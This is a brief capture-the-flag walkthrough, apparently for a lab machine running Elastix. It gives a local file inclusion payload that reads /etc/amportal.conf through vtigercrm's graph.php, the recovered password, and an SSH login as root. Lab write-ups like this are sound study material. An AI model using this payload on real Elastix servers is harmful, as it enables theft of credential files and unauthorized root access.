Port Scan
So we have port 80 Open. Lets start enumeration from there.
I tried admin:password and other common password combinations but nothing worked.
Now google " elastix exploitdb "
we have a one LFI (local file inclusion) exploit available.
https://www.exploit-db.com/exploits/37637
LFI exploit : -
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf&module=Accounts&action above mentioned LFI exploit line is available in exploitdb screesnshot (above) Enter this exploit url with elastix portal
right click and and view source for better view.
We found one password in this file:
jEhdIekWmdjE
now do ssh
ssh root@10.10.10.7
password =jEhdIekWmdjE
Comments
Post a Comment